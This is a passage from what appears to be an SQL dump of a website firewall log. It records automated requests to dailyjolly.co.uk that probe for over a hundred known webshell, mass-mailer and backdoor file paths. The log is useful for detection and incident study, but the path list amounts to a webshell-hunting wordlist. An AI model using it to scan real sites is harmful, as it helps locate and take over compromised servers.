9|0|0|0|dailyjolly.co.uk/n.php',0,19,0),('20.51.247.40',338949928,'',0,1673896837.6724,55,'M9RCBTP2iuqsXcpfeQNS3DtF','','19|0|0|0|dailyjolly.co.uk/new-index.php',0,19,0),('20.51.247.40',338949928,'',0,1673896853.8089,55,'OxvagmoyuW7RbHsd30c6zPBk','','19|0|0|0|dailyjolly.co.uk/old-index.php',0,19,0),('20.51.247.40',338949928,'',0,1673896868.6829,55,'9qtOC5r71BJSVXDYykwNLaTl','','19|0|0|0|dailyjolly.co.uk/Sendemail.php',0,19,0),('20.51.247.40',338949928,'',0,1673896881.2624,55,'r02wTPohuNMQFDtyHWnJva5U','','19|0|0|0|dailyjolly.co.uk/shell.php',0,19,0),('20.51.247.40',338949928,'',0,1673896897.6556,55,'Dgl7tozJ421rsphZecxfAqiM','','19|0|0|0|dailyjolly.co.uk/3index.php',0,19,0),('20.51.247.40',338949928,'',0,1673896911.8348,55,'sGxitHJgPFdEq810NIpYwAUo','','19|0|0|0|dailyjolly.co.uk/2index.php',0,19,0),('20.51.247.40',338949928,'',0,1673896926.2812,55,'hiQIX1p5LE6fVHetPKxZ8AJD','','19|0|0|0|dailyjolly.co.uk/kindex.php',0,19,0),('20.51.247.40',338949928,'',0,1673896942.8603,55,'7tGrfxRebqcyV4BOFowhJsMU','','19|0|0|0|dailyjolly.co.uk/cpanel.php',0,19,0),('20.51.247.40',338949928,'',0,1673896959.6576,55,'UXF4mKOdipCHEbvz7x51hTSl','','19|0|0|0|dailyjolly.co.uk/cp.php',0,19,0),('20.51.247.40',338949928,'',0,1673896979.6544,55,'R8Ml2e0yEaPxBV3KDm7rYdwZ','','19|0|0|0|dailyjolly.co.uk/mar.php',0,19,0),('20.51.247.40',338949928,'',0,1673897007.6300,55,'iJRsHZkh6gYaDPdjBneFpExQ','','19|0|0|0|dailyjolly.co.uk/sym403.php',0,19,0),('20.51.247.40',338949928,'',0,1673897021.3161,55,'rSIUb9mH3G87WzTMajQlv0Y5','','19|0|0|0|dailyjolly.co.uk/content.php',0,19,0),('20.51.247.40',338949928,'',0,1673897037.2091,55,'fhz6sbB0wDO9GqN7lEcAIkFM','','19|0|0|0|dailyjolly.co.uk/1index.php',0,19,0),('20.51.247.40',338949928,'',0,1673897051.9305,55,'mboF3D2BxCqLfYSKQtH7kUgu','','19|0|0|0|dailyjolly.co.uk/wikindex.php',0,19,0),('20.51.247.40',338949928,'',0,1673897066.8168,55,'5VvedPlRpCrjIt7UJn8wBGQ6','','19|0|0|0|dailyjolly.co.uk/FoxWSOv1.php',0,19,0),('20.51.247.40',338949928,'',0,1673897080.8339,55,'XILiQylwt2jUOYx6NFAZWEMG','','19|0|0|0|dailyjolly.co.uk/alfa.php',0,19,0),('20.51.247.40',338949928,'',0,1673897089.3503,55,'wuQYR3o0jmtIPs1khandKlXg','','19|0|0|0|dailyjolly.co.uk/alf.php',0,19,0),('20.51.247.40',338949928,'',0,1673897089.7842,55,'qEZRj8m3yCAGdsBUWniS2uHN','','19|0|0|0|dailyjolly.co.uk/ws.php',0,19,0),('20.51.247.40',338949928,'',0,1673897090.2591,55,'dGJQxHD95SvLKCa7eOo4c6uZ','','19|0|0|0|dailyjolly.co.uk/1.php',0,19,0),('20.51.247.40',338949928,'',0,1673897090.6943,55,'v9QBAlLnZsaytu1iPbHIVKNf','','19|0|0|0|dailyjolly.co.uk/2.php',0,19,0),('20.51.247.40',338949928,'',0,1673897091.1089,55,'CWnVDK6hyULFo3ut0biIae2E','','19|0|0|0|dailyjolly.co.uk/3.php',0,19,0),('20.51.247.40',338949928,'',0,1673897091.6049,55,'iL1CdepfzP8G5FMwYRD4maUr','','19|0|0|0|dailyjolly.co.uk/leaf.php',0,19,0),('20.51.247.40',338949928,'',0,1673897092.1123,55,'Cn4NZq1SPHJEFgXLfv3VGAja','','19|0|0|0|dailyjolly.co.uk/bb.php',0,19,0),('20.51.247.40',338949928,'',0,1673897092.5607,55,'UCF54ZqQid0Tbuo9LcJkNrBY','','19|0|0|0|dailyjolly.co.uk/leafmailer2.8.php',0,19,0),('20.51.247.40',338949928,'',0,1673897092.9428,55,'BYl4sWEmeCx5M1A8UkJXrSHy','','19|0|0|0|dailyjolly.co.uk/mailer.php',0,19,0),('20.51.247.40',338949928,'',0,1673897093.3737,55,'HSxvc1jg6WBZwDLtpbYaPr5h','','19|0|0|0|dailyjolly.co.uk/alex.php',0,19,0),('20.51.247.40',338949928,'',0,1673897093.8423,55,'kFQUBDqC67pOJKSZnuaVWMd1','','19|0|0|0|dailyjolly.co.uk/lf.php',0,19,0),('20.51.247.40',338949928,'',0,1673897094.2581,55,'vqgc6zUfAdJ8QBPWuMVbx0k1','','19|0|0|0|dailyjolly.co.uk/xox.php',0,19,0),('20.51.247.40',338949928,'',0,1673897094.7480,55,'whgZ9dGf7DT0L4vISnVtxWBY','','19|0|0|0|dailyjolly.co.uk/xo.php',0,19,0),('20.51.247.40',338949928,'',0,1673897095.1292,55,'3KkFP21tfBohQ8IEg6MOjn0W','','19|0|0|0|dailyjolly.co.uk/mi.php',0,19,0),('20.51.247.40',338949928,'',0,1673897095.5272,55,'orXnEs25F3aAjgwC4yq8cPBN','','19|0|0|0|dailyjolly.co.uk/!.php',0,19,0),('20.51.247.40',338949928,'',0,1673897095.9960,55,'jyOdovK2awVM5Qsq8ANDhWlS','','19|0|0|0|dailyjolly.co.uk/alexusmailer2.0.php',0,19,0),('20.51.247.40',338949928,'',0,1673897096.4169,55,'rczTBnKs7ChbM94u2lH08dao','','19|0|0|0|dailyjolly.co.uk/rss.php',0,19,0),('20.51.247.40',338949928,'',0,1673897096.9481,55,'UNCDynvfw8T3iBbXtuacsZI7','','19|0|0|0|dailyjolly.co.uk/priv8.php',0,19,0),('20.51.247.40',338949928,'',0,1673897097.4139,55,'NjSh5pP6TexL2IBzdVyvA4qO','','19|0|0|0|dailyjolly.co.uk/WSO.php',0,19,0),('20.51.247.40',338949928,'',0,1673897097.7819,55,'J74xbSUfgw8Le2azVWOrAlFp','','19|0|0|0|dailyjolly.co.uk/alwso.php',0,19,0),('20.51.247.40',338949928,'',0,1673897098.1975,55,'t6wdN8f4iWhKQnMAulmSOVYb','','19|0|0|0|dailyjolly.co.uk/wp-content/includes/uploads/Va.php',0,19,0),('20.51.247.40',338949928,'',0,1673897098.6954,55,'CWH68kncvTA9Z5pw0SR1P4be','','19|0|0|0|dailyjolly.co.uk/wp-content/uploads/readindex.php',0,19,0),('20.51.247.40',338949928,'',0,1673897099.0443,55,'hrDSwBKmEdsUfnN49bWViXYP','','19|0|0|0|dailyjolly.co.uk/wp-content/uploads/small.php',0,19,0),('20.51.247.40',338949928,'',0,1673897099.5838,55,'6nGbRSkl57NQXPBxAdVE8eqO','','19|0|0|0|dailyjolly.co.uk/wp-admin/includes/mar.php',0,19,0),('20.51.247.40',338949928,'',0,1673897099.9965,55,'oQMvDgEJs6NqprUtFjbmk2KB','','19|0|0|0|dailyjolly.co.uk/wp-admin/includes/readindex.php',0,19,0),('20.51.247.40',338949928,'',0,1673897100.3772,55,'LRyAY0GwQkbKXDs5VU3FhiWP','','19|0|0|0|dailyjolly.co.uk/wp-admin/includes/maint/wp-readindex.php',0,19,0),('20.51.247.40',338949928,'',0,1673897100.7187,55,'U5PDnqFjsbKhVi0Mu9ez4OdE','','19|0|0|0|dailyjolly.co.uk/wp-admin/includes/maint/wp-cron.php',0,19,0),('20.51.247.40',338949928,'',0,1673897101.1842,55,'1M4QSuEcYIJz9BO8tVmDfwjR','','19|0|0|0|dailyjolly.co.uk/wp-admin/includes/media-site.php',0,19,0),('20.51.247.40',338949928,'',0,1673897101.5384,55,'Ua04rnOKpGwu98CkMP7WdH3R','','19|0|0|0|dailyjolly.co.uk/wp-admin/includes/class-wp-media-list-data.php',0,19,0),('20.51.247.40',338949928,'',0,1673897102.0905,55,'zMyF6paODwRrkvUGPqngWQ09','','19|0|0|0|dailyjolly.co.uk/wp-admin/includes/maint/repair-bak.php',0,19,0),('20.51.247.40',338949928,'',0,1673897102.5221,55,'2JKuQMRNpT3otOiXCEZBG8SA','','19|0|0|0|dailyjolly.co.uk/wp-admin/includes/edit-tag-menu.php',0,19,0),('20.51.247.40',338949928,'',0,1673897102.9644,55,'PhJs18ZMfyaoXecrl6NtvGng','','19|0|0|0|dailyjolly.co.uk/wp-admin/includes/tablepress_controllers.php',0,19,0),('20.51.247.40',338949928,'',0,1673897103.3280,55,'sFcuqZiv769xXYrkO0d3EmVn','','19|0|0|0|dailyjolly.co.uk/wp-admin/includes/block-line.php',0,19,0),('20.51.247.40',338949928,'',0,1673897103.6997,55,'nPALgXQyksb9WaM36cjON02Y','','19|0|0|0|dailyjolly.co.uk/wp-admin/css/modern/colors.css.php',0,19,0),('20.51.247.40',338949928,'',0,1673897104.0899,55,'PIV0v3yZ4tlNxTEzbhBDLKWC','','19|0|0|0|dailyjolly.co.uk/wp-includes/sys.php',0,19,0),('20.51.247.40',338949928,'',0,1673897104.4568,55,'Fsk8GjwlQNDAozVxiIcRh2SP','','19|0|0|0|dailyjolly.co.uk/wp-content/includes/alexusmailer2.0.php',0,19,0),('20.51.247.40',338949928,'',0,1673897104.8378,55,'sNGJel83MBSYc7vUAFZ5QaLo','','19|0|0|0|dailyjolly.co.uk/wp-content/includes/leaf.php',0,19,0),('20.51.247.40',338949928,'',0,1673897105.1871,55,'90QyKUJWwxLtk5TNrCIjbgpS','','19|0|0|0|dailyjolly.co.uk/wp-content/includes/leafmailer2.8.php',0,19,0),('20.51.247.40',338949928,'',0,1673897105.5251,55,'thsX8LvFJx51cQ79l6dUgpMN','','19|0|0|0|dailyjolly.co.uk/wp-content/uploads/alexusmailer2.0.php',0,19,0),('20.51.247.40',338949928,'',0,1673897105.9184,55,'e5kxGsmK38aUuEOwHhTZNfcQ','','19|0|0|0|dailyjolly.co.uk/wp-content/uploads/leaf.php',0,19,0),('20.51.247.40',338949928,'',0,1673897106.2740,55,'7NoeLR39S2QxnM1tdBqlKAyr','','19|0|0|0|dailyjolly.co.uk/wp-content/uploads/leafmailer2.8.php',0,19,0),('20.51.247.40',338949928,'',0,1673897106.6771,55,'jGrtw8psJW6VKndXQNu704Og','','19|0|0|0|dailyjolly.co.uk/wp-admin/includes/leafmailer2.8.php',0,19,0),('20.51.247.40',338949928,'',0,1673897107.0493,55,'ZGlJnYEk0F8izKtWXSVTvf2d','','19|0|0|0|dailyjolly.co.uk/wp-admin/includes/leaf.php',0,19,0),('20.51.247.40',338949928,'',0,1673897107.4534,55,'gvX2dU79e3TRFjwyuCLpfm5o','','19|0|0|0|dailyjolly.co.uk/wp-admin/includes/alexusmailer2.0.php',0,19,0),('20.51.247.40',338949928,'',0,1673897107.8298,55,'IGDhXp4r0VmM7uiZk8Yag3fy','','19|0|0|0|dailyjolly.co.uk/xxx.php',0,19,0),('20.51.247.40',338949928,'',0,1673897108.1815,55,'Iqw38KsblxZTePaYJUS06rVi','','19|0|0|0|dailyjolly.co.uk/11index.php',0,19,0),('20.51.247.40',338949928,'',0,1673897108.5346,55,'2xSUR5EjsIety8rk6WbMu9Om','','19|0|0|0|dailyjolly.co.uk/hello.php',0,19,0),('20.51.247.40',338949928,'',0,1673897108.9208,55,'V7f4ywp5U3JFIARWK2MPjumE','','19|0|0|0|dailyjolly.co.uk/fa.php',0,19,0),('20.51.247.40',338949928,'',0,1673897109.2869,55,'Y6PqQRlGZip4BoS59wmUKDbe','','19|0|0|0|dailyjolly.co.uk/alexus-mailer.php',0,19,0),('20.51.247.40',338949928,'',0,1673897109.6317,55,'skHQnyAg6r2xPamp1MIV9Clh','','19|0|0|0|dailyjolly.co.uk/doc.php',0,19,0),('20.51.247.40',338949928,'',0,1673897109.9876,55,'307cPH1oqu6WSIj9AdrFwKzE','','19|0|0|0|dailyjolly.co.uk/mini.php',0,19,0),('20.51.247.40',338949928,'',0,1673897110.3501,55,'nR35iSXydL19HceoGkqDBgOE','','19|0|0|0|dailyjolly.co.uk/wp-ad.php',0,19,0),('20.51.247.40',338949928,'',0,1673897110.6859,55,'5n8z3yUoBY67AbLG4fQlW9ma','','19|0|0|0|dailyjolly.co.uk/wp-file.php',0,19,0),('20.51.247.40',338949928,'',0,1673897111.0389,55,'rheqGdAy0CRS7BZ6xEbpUzjK','','19|0|0|0|dailyjolly.co.uk/ok.php',0,19,0),('20.51.247.40',338949928,'',0,1673897111.4455,55,'8tKqRcW4iChb6QwUBGFm9S2z','','19|0|0|0|dailyjolly.co.uk/wso2.php',0,19,0),('20.51.247.40',338949928,'',0,1673897111.8313,55,'2emixBK58LYjtZrNMlCE4UWV','','19|0|0|0|dailyjolly.co.uk/wso1.php',0,19,0),('20.51.247.40',338949928,'',0,1673897112.2749,55,'4DkwJa8FHeoWsrzd6Ub27QvB','','19|0|0|0|dailyjolly.co.uk/if.php',0,19,0),('20.51.247.40',338949928,'',0,1673897112.6204,55,'Bse7lGcodAqwb36xhI2tQzVj','','19|0|0|0|dailyjolly.co.uk/kk.php',0,19,0),('20.51.247.40',338949928,'',0,1673897112.9892,55,'y7BlXzntKdVHeRaiN0CQu2pc','','19|0|0|0|dailyjolly.co.uk/anone.php',0,19,0),('20.51.247.40',338949928,'',0,1673897113.3166,55,'BKZd9M1ukaHq0p5zR7iODWIL','','19|0|0|0|dailyjolly.co.uk/wp-configer.php',0,19,0),('20.51.247.40',338949928,'',0,1673897113.6562,55,'d3hcXsgr8i6x9n1WjukYCfOV','','19|0|0|0|dailyjolly.co.uk/send.php',0,19,0),('20.51.247.40',338949928,'',0,1673897114.0132,55,'xdyNBLlonWc6OQtZajP9RJYv','','19|0|0|0|dailyjolly.co.uk/wp-rss.php',0,19,0),('20.51.247.40',338949928,'',0,1673897114.3402,55,'hyVFYx50rLXlT4pJZvIfqbMj','','19|0|0|0|dailyjolly.co.uk/.wp-cache.php',0,19,0),('20.51.247.40',338949928,'',0,1673897114.7027,55,'y1GTRAfWnjlILFbg6ODQSuHV','','19|0|0|0|dailyjolly.co.uk/sendmail.php',0,19,0),('20.51.247.40',338949928,'',0,1673897115.0745,55,'9rV6voRahObBzYMeUA5LPZDI','','19|0|0|0|dailyjolly.co.uk/wp/rahma.php',0,19,0),('20.51.247.40',338949928,'',0,1673897115.4163,55,'2oXlvMGLNEc18FKT79e6aYDd','','19|0|0|0|dailyjolly.co.uk/rahma.php',0,19,0),('20.51.247.40',338949928,'',0,1673897115.8440,55,'QE8mH51rtXCbKd9eAfaFO27x','','19|0|0|0|dailyjolly.co.uk/nasgor.php',0,19,0),('20.51.247.40',338949928,'',0,1673897116.2321,55,'BrAbioVMGENC1Lsvg8TpXcD3','','19|0|0|0|dailyjolly.co.uk/404.php',0,19,0),('20.51.247.40',338949928,'',0,1673897116.5907,55,'zYnlv6U7sH9cEAwO2tFShXbJ','','19|0|0|0|dailyjolly.co.uk/sym.php',0,19,0),('20.51.247.40',338949928,'',0,1673897116.9832,55,'gs2m60n5icpN9zFeaBRrJbGf','','19|0|0|0|dailyjolly.co.uk/wp-confirm.php',0,19,0),('20.51.247.40',338949928,'',0,1673897117.3644,55,'IfakWFtwRJ9ymMOLCXq7Nj3g','','19|0|0|0|dailyjolly.co.uk/alfa123.php',0,19,0),('20.51.247.40',338949928,'',0,1673897117.7185,55,'qMt9B35TZKxCegSUIONDdc26','','19|0|0|0|dailyjolly.co.uk/dr.php',0,19,0),('20.51.247.40',338949928,'',0,1673897118.1960,55,'TGR24NBVhFEm8oL5wOpYzuXk','','19|0|0|0|dailyjolly.co.uk/bypass.php',0,19,0),('20.51.247.40',338949928,'',0,1673897118.5963,55,'fdA9xmPHoR4wzynUQFWB7T8N','','19|0|0|0|dailyjolly.co.uk/wp-blog.php',0,19,0),('20.51.247.40',338949928,'',0,1673897119.1023,55,'UPBJZ1gzAIGwp6Vc0ls7yWrE','','19|0|0|0|dailyjolly.co.uk/data.php',0,19,0),('20.51.247.40',338949928,'',0,1673897119.5073,55,'E8isehy7tOzuL6dGqKTPal94','','19|0|0|0|dailyjolly.co.uk/wp-one.php',0,19,0),('20.51.247.40',338949928,'',0,1673897119.9729,55,'cig7Y3BQ5PtyH4RUl26FMx1G','','19|0|0|0|dailyjolly.co.uk/alexus.php',0,19,0),('20.51.247.40',338949928,'',0,1673897120.3459,55,'pixtJ2N8cTmnIEBZfYLsw0Fg','','19|0|0|0|dailyjolly.co.uk/edit-form.php',0,19,0),('20.51.247.40',338949928,'',0,1673897120.8068,55,'CRH6rSNl8UZq4jIJpfmLkdaY','','19|0|0|0|dailyjolly.co.uk/wso1337.php',0,19,0),('20.51.247.40',338949928,'',0,1673897121.2799,55,'FfQ1p928XaMSO0JkWjveiLht','','19|0|0|0|dailyjolly.co.uk/www.php',0,19,0),('20.51.247.40',338949928,'',0,1673897121.6710,55,'fxusXF2ZWCT4LVhbAQgcd9Yw','','19|0|0|0|dailyjolly.co.uk/uploads/contexmini.php',0,19,0),('20.51.247.40',338949928,'',0,1673897122.0946,55,'2duBjqIvfoGk8rAmM6nwlxSC','','19|0|0|0|dailyjolly.co.uk/blog.php',0,19,0),('20.51.247.40',338949928,'',0,1673897122.5187,55,'vrsbKXHqP0cwW8oEQ6BzSae7','','19|0|0|0|dailyjolly.co.uk/it.php',0,19,0),('20.51.247.40',338949928,'',0,1673897122.8942,55,'ZKCOGDn7keIE0tUN3za1y8Wr','','19|0|0|0|dailyjolly.co.uk/kiss.php',0,19,0),('20.51.247.40',338949928,'',0,1673897123.2925,55,'XBKsxAPFZ4YMlfun26kHLqT5','','19|0|0|0|dailyjolly.co.uk/0.php',0,19,0),('20.51.247.40',338949928,'',0,1673897123.6530,55,'wjFOCZMpVHDu4mT0SIfRBks6','','19|0|0|0|dailyjolly.co.uk/wp2.php',0,19,0),('20.51.247.40',338949928,'',0,1673897124.3007,55,'8ZHzfBFC16ykxJ3ros95lSGb','','19|0|0|0|dailyjolly.co.uk/owl.php',0,19,0),('20.51.247.40',338949928,'',0,1673897124.7453,55,'DIRu05wv87Sb1diltMBLzyer','','19|0|0|0|dailyjolly.co.uk/symlink.php',0,19,0),('20.51.247.40',338949928,'',0,1673897125.3150,55,'oH2lbic1gyFNE4Ps38rtBT5Z','','19|0|0|0|dailyjolly.co.uk/ohayo.php',0,19,0),('20.51.247.40',338949928,'',0,1673897125.7662,55,'462jPmGZL1e78aUTkdDyRM0x','','19|0|0|0|dailyjolly.co.uk/100.php',0,19,0),('20.51.247.40',338949928,'',0,1673897126.1493,55,'rKY40FivlQaUy5ugmP6SOcHT','','19|0|0|0|dailyjolly.co.uk/777.php',0,19,0),('20.51.247.40',338949928,'',0,1673897126.6062,55,'bUxesaXSuRfTmQrPlBZ2qMjg','','19|0|0|0|dailyjolly.co.uk/wp-content/wp-logins.php',0,19,0),('20.51.247.40',338949928,'',0,1673897127.0447,55,'3dchrLlAeM8RI6PXwgqtpijV','','19|0|0|0|dailyjolly.co.uk/wp-content/wp-admin.php',0,19,0),('20.51.247.40',338949928,'',0,1673897127.4628,55,'VxvHB6bahQnoSYgI87JAj4uk','','19|0|0|0|dailyjolly.co.uk/wp-admin.php',0,19,0),('20.51.247.40',338949928,'',0,1673897127.8235,55,'UG8yoptXMJH9bm17Rixjvans','','19|0|0|0|dailyjolly.co.uk/shx.php',0,19,0),('20.51.247.40',338949928,'',0,1673897128.2686,55,'CRh3PaSjUkTGugtryF57vZlz','','19|0|0|0|dailyjolly.co.uk/FoxWSO.php',0,19,0),('20.51.247.40',338949928,'',0,1673897128.6528,55,'Pqma4vidOL07hRouXkNT1crn','','19|0|0|0|dailyjolly.co.uk/cms.php',0,19,0),('20.51.247.40',338949928,'',0,1673897129.0713,55,'cP6YSwNlCe4E1X8rognBviA3','','19|0|0|0|dailyjolly.co.uk/stindex.php',0,19,0),('20.51.247.40',338949928,'',0,1673897129.4404,55,'Pjfzprnh38RwBUSeaMdCH6KL','','19|0|0|0|dailyjolly.co.uk/wp-uploads.php',0,19,0),('20.51.247.40',338949928,'',0,1673897129.9300,55,'E5WVrcak1Ioe6CSv9uDZAtgx','','19|0|0|0|dailyjolly.co.uk/autoload_classmap.php',0,19,0),('20.51.247.40',338949928,'',0,1673897130.3807,55,'gbEfQHt5NWcylAiDLMeGk9YK','','19|0|0|0|dailyjolly.co.uk/Gel.php',0,19,0),('20.51.247.40',338949928,'',0,1673897144.1086,55,'1fhJs42kbMnZXcU7NtpEzva9','','19|0|0|0|dailyjolly.co.uk/defau1t.php',0,19,0),('20.51.247.40',338949928,'',0,1673897157.0725,55,'Wlq9x5CG7AEQYoDcktUzOeg8','','19|0|0|0|dailyjolly.co.uk/0byte.php',0,19,0),('20.51.247.40',338949928,'',0,1673897172.8155,55,'sAJOhV49Ij2gc7NZD8wvHQxd','','19|0|0|0|dailyjolly.co.uk/wp.php',0,19,0),('20.51.247.40',338949928,'',0,1673897187.8705,55,'OZ9VlHkWoJNAUYXfBg0y3mha','','19|0|0|0|dailyjolly.co.uk/41.php',0,19,0),('20.51.247.40',338949928,'',0,1673897201.5184,55,'NPUGSwlEM5u72Kdq9OZynci8','','19|0|0|0|dailyjolly.co.uk/4price.php',0,19,0),('20.51.247.40',338949928,'',0,1673897216.4274,55,'vgjDqOw0lcozahSefsu27XtM','','19|0|0|0|dailyjolly.co.uk/MARIJUANA.php',0,19,0),('20.51.247.40',338949928,'',0,1673897232.0737,55,'dAylkBW9TnEeHL0mbVDgOraK','','19|0|0|0|dailyjolly.co.uk/fk.php',0,19,0),('20.51.247.40',338949928,'',0,1673897249.5249,55,'0cvqsuYNCgx1ySo4ARPHLJ7h','','19|0|0|0|dailyjolly.co.uk/new.php',0,19,0),('20.51.247.40',338949928,'',0,1673897279.9533,55,'HNnia8YElfWhK5MjvrVxD4Bc','','19|0|0|0|dailyjolly.co.uk/sindex.php',0,19,0),('20.51.247.40',338949928,'',0,1673897294.8999,55,'5zvGpNTBY0UQhcoCuKE9A2Fa','','19|0|0|0|dailyjolly.co.uk/baindex.php',0,19,0),('20.51.247.40',338949928,'',0,1673897309.0863,55,'ERipsGh7r5BHw0y8oLSOXed3','','19|0|0|0|dailyjolly.co.uk/wi.php',0,19,0),('20.51.247.40',338949928,'',0,1673897320.7816,55,'cYWjPQx1IuBTMGZ9s0yoUf4d','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/upspy/index.php',0,19,0),('20.51.247.40',338949928,'',0,1673897341.9519,55,'Z7HX4ujNLAROaF9PkiEV05Yl','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/ubh/index.php',0,19,0),('20.51.247.40',338949928,'',0,1673897355.6268,100,'MDfvOXceU61tA3SZaTHG9ri4','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php',0,13,0),('20.51.247.40',338949928,'',0,1673897370.6025,55,'0PS27CTg1mbr5qAUcntX3oOM','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/gaukingo/db.php',0,19,0),('20.51.247.40',338949928,'',0,1673897386.7710,55,'IOmCVPN02s85hnc6AH7wQEJD','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/three-column-screen-layout/db.php',0,19,0),('20.51.247.40',338949928,'',0,1673897401.4258,100,'LszvJGcDU3t1d05eiyhBY6KO','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/xichang/x.php',0,13,0),('20.51.247.40',338949928,'',0,1673897438.7101,55,'6xN9rneGyqK27FL4T3DC0sYP','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/wp-db-ajax-made/wp-ajax.php',0,19,0),('20.51.247.40',338949928,'',0,1673897444.9520,55,'9QCy7ZYp80H6ti35ju1AhTJq','','19|0|0|0|dailyjolly.co.uk/wp-admin/shapes.php',0,19,0),('20.51.247.40',338949928,'',0,1673897445.4075,55,'0WVUCIBNLvsuqHSa7YGK2wby','','19|0|0|0|dailyjolly.co.uk/Marvins.php',0,19,0),('20.51.247.40',338949928,'',0,1673897445.8278,55,'dQi9JxI3aq0zAyNltY5P8Vb2','','19|0|0|0|dailyjolly.co.uk/wp-includes/css/modules.php',0,19,0),('20.51.247.40',338949928,'',0,1673897446.2448,55,'GTrEhRZ3b7UIgO4lewc581kY','','19|0|0|0|dailyjolly.co.uk/olux.php%09%09',0,19,0),('20.51.247.40',338949928,'',0,1673897446.6839,55,'kcNCXtxwvHoPg7T3p9VL6h1B','','19|0|0|0|dailyjolly.co.uk/indoxploit.php',0,19,0),('20.51.247.40',338949928,'',0,1673897447.1981,55,'VeNpRxPuTLSJZ4UO3YMjCng9','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/css-ready-sel/file.php',0,19,0),('20.51.247.40',338949928,'',0,1673897447.5637,55,'HpZW6g2VKR49hnF1JNPrdvqE','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/css-ready/file.php',0,19,0),('20.51.247.40',338949928,'',0,1673897447.9900,55,'6IWAfBaXLZj5J3vKSbRk8zxP','','19|0|0|0|dailyjolly.co.uk/wp-content/think.php',0,19,0),('20.51.247.40',338949928,'',0,1673897448.3970,55,'08IF7WkOBqtmTG3DiHUwRNb9','','19|0|0|0|dailyjolly.co.uk/fw.php',0,19,0),('20.51.247.40',338949928,'',0,1673897448.7468,55,'knZJjlAvL3EUbKMDaqmzGtQS','','19|0|0|0|dailyjolly.co.uk/administrator/templates/bluestork/index.php',0,19,0),('20.51.247.40',338949928,'',0,1673897449.1234,55,'BXGhjFDK1Zkpm6tMWf3OJoLr','','19|0|0|0|dailyjolly.co.uk/administrator/templates/bluestork/error.php',0,19,0),('20.51.247.40',338949928,'',0,1673897449.5486,55,'l9RLTkqhNKXPcxQ4Mbjw1Br7','','19|0|0|0|dailyjolly.co.uk/administrator/templates/hathor/index.php',0,19,0),('20.51.247.40',338949928,'',0,1673897450.0758,55,'lGZo3akNzJqRsr07SCMmE5fA','','19|0|0|0|dailyjolly.co.uk/administrator/templates/hathor/error.php',0,19,0),('20.51.247.40',338949928,'',0,1673897450.4646,55,'ola26q0gwxpAQCIUH3v7SPcy','','19|0|0|0|dailyjolly.co.uk/administrator/templates/isis/index.php',0,19,0),('20.51.247.40',338949928,'',0,1673897450.8830,55,'BJVqCfHI1bdGZAjtximNehFs','','19|0|0|0|dailyjolly.co.uk/administrator/templates/isis/error.php',0,19,0),('20.51.247.40',338949928,'',0,1673897451.2761,55,'rH85Gmt9NUDx6w2cSTpXVLRq','','19|0|0|0|dailyjolly.co.uk/templates/beez/index.php',0,19,0),('20.51.247.40',338949928,'',0,1673897451.6826,55,'GICgaiXMz5d6w2rmoKbStnBx','','19|0|0|0|dailyjolly.co.uk/templates/ja_purity/index.php',0,19,0),('20.51.247.40',338949928,'',0,1673897452.1058,55,'sU4xSdbQf0EJRhGIiyZAKTp5','','19|0|0|0|dailyjolly.co.uk/templates/rhuk_milkyway/index.php',0,19,0),('20.51.247.40',338949928,'',0,1673897452.5259,55,'jpVJUdKDogIev4umQH15axcX','','19|0|0|0|dailyjolly.co.uk/templates/beez3/index.php',0,19,0),('20.51.247.40',338949928,'',0,1673897452.9110,55,'w5QOLvWoxTIim2sJqcKD3YSE','','19|0|0|0|dailyjolly.co.uk/templates/beez3/error.php',0,19,0),('20.51.247.40',338949928,'',0,1673897453.2785,55,'yR6piJcYnKvCMBS4GQ5z8jut','','19|0|0|0|dailyjolly.co.uk/templates/beez5/index.php',0,19,0),('20.51.247.40',338949928,'',0,1673897453.6610,55,'P9FMrZpIsjmCxu8nzvJGhYf1','','19|0|0|0|dailyjolly.co.uk/templates/beez5/error.php',0,19,0),('20.51.247.40',338949928,'',0,1673897454.1579,55,'VuESBjtLp6RdsrgzAb0ChWoO','','19|0|0|0|dailyjolly.co.uk/templates/beez_20/index.php',0,19,0),('20.51.247.40',338949928,'',0,1673897454.5517,55,'lfei3agr9mLnkq06YS4Q2AUx','','19|0|0|0|dailyjolly.co.uk/templates/beez_20/error.php',0,19,0),('20.51.247.40',338949928,'',0,1673897454.9883,55,'5GB8erOxvsWX0CM7Y9KRJkAw','','19|0|0|0|dailyjolly.co.uk/templates/protostar/index.php',0,19,0),('20.51.247.40',338949928,'',0,1673897455.4434,55,'d83yn47JpXoFZGSHY9KL5mvx','','19|0|0|0|dailyjolly.co.uk/templates/protostar/error.php',0,19,0),('20.51.247.40',338949928,'',0,1673897455.8345,55,'b1x43HnDuyAYhEjQNtcPpWe7','','19|0|0|0|dailyjolly.co.uk/templates/atomic/index.php',0,19,0),('20.51.247.40',338949928,'',0,1673897456.2771,55,'AIMs29OJUBQaG5T64oiDnVYe','','19|0|0|0|dailyjolly.co.uk/templates/atomic/error.php',0,19,0),('20.51.247.40',338949928,'',0,1673897456.7953,55,'dZD8oQifF7XSzUtI36Ejhvel','','19|0|0|0|dailyjolly.co.uk/wp-admin/network/wp-footer.php',0,19,0),('20.51.247.40',338949928,'',0,1673897457.2019,55,'pcTfARH0sDdj5ir4YExIVqag','','19|0|0|0|dailyjolly.co.uk/wp-content/vuln.php',0,19,0),('20.51.247.40',338949928,'',0,1673897457.6326,55,'ApuydZizQUl4DfmOGM9JnK5j','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/ppus/up.php',0,19,0),('20.51.247.40',338949928,'',0,1673897458.0245,55,'n5NHUJhI1sXQgpyvV63zw8Sm','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/theme-configurator/mini.php',0,19,0),('20.51.247.40',338949928,'',0,1673897458.4281,55,'syJboStUIqP0p5EQnDir78eV','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/widget-logic/mini.php',0,19,0),('91.239.157.179',1542430131,'',0,1673898020.2960,55,'m1a9PzrMVuTcSYWAeidgDy5b','','19|0|0|0|www.dailyjolly.co.uk/1index.php',0,19,0),('91.239.157.179',1542430131,'',0